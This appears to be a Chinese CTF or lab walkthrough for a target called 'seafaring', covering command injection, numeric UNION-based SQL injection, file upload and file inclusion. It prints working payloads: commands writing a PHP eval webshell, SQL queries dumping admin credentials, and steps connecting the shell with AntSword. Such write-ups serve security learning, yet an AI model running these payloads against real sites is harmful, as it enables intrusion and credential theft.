当前位置: 首页 > article >正文

seafaring寻找漏洞

一.命令执行漏洞

(1)下面有一个输入框,输入ls进行查看

(2)输入echo '<?php phpinfo();?>' > qxl.php 并且访问

(3)写入一句话木马,并且访问蚁剑连接

echo '<?php @eval($_POST['cmd'];?>'>q.php

二.sql注入

测试sql注入为数字型

(1)查询数据库

-1 union select 1,2,database()

(2)查看表名

-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

(3)查看列名

1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #

(4)查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

(5)最终得出账号是admin,密码是mysql

三.文件上传漏洞

(1)使用得到的账号密码进行登录,进去之后发现可以上传文件

(2)写入一句话木马到qxl.php然后上传,并且访问上传成功后得到的路径

(3)蚁剑连接

四.文件包含漏洞

(1)首页的关于界面存在文件包含漏洞

(2).访问之前写入的qxl.php中进行查看发现远程文件包含关闭,本地文件可以访问

(3).包含之前的q.php一句话木马,访问并且蚁剑连接


http://www.kler.cn/a/308332.html

相关文章:

  • acwing算法基础02一高精度,前缀和,差分
  • 【设计模式】行为型模式(二):策略模式、命令模式
  • JWT深度解析:Java Web中的安全传输与身份验证
  • ssm100医学生在线学习交流平台+vue(论文+源码)_kaic
  • 【OceanBase 诊断调优】—— ocp上针对OB租户CPU消耗计算逻辑
  • 使用jmeter查询项目数据库信息,保存至本地txt或excel文件1108
  • 算法入门-贪心1
  • 【React】MobX
  • CI/CD持续集成和持续交付(git工具、gitlab代码仓库、jenkins)
  • DL/T645-2007 通信库(C#版本)
  • 裸金属服务器怎么实现算力共享,裸金属服务器提供者怎么做,租户怎样使用,共享平台需要搭建什么
  • C++11新增特性:lambda表达式、function包装器、bind绑定
  • 在Windows系统中管理苹果磁盘实用工具-使用磁盘,读取磁盘中的文件-供大家学习研究参考
  • 深入解析代理模式:静态代理、JDK 动态代理和 CGLIB 的全方位对比!
  • 开源模型应用落地-qwen模型小试-调用Qwen2-VL-7B-Instruct-更清晰地看世界(一)
  • 魔方财务安装指南
  • Qt6编译达梦8数据库驱动插件
  • 92、K8s之ingress下集
  • 遍历指定的目录a中的所有子目录及所有文件os.walk(root_dir)
  • Java进阶13讲__补充2/2
  • 初始爬虫6
  • PostgreSQL15.x安装教程
  • Vert.x初探
  • react native(expo)选择图片/视频并上传阿里云oss
  • Java数据存储结构——二叉查找树
  • 在linux注册服务并开机启动springboot程序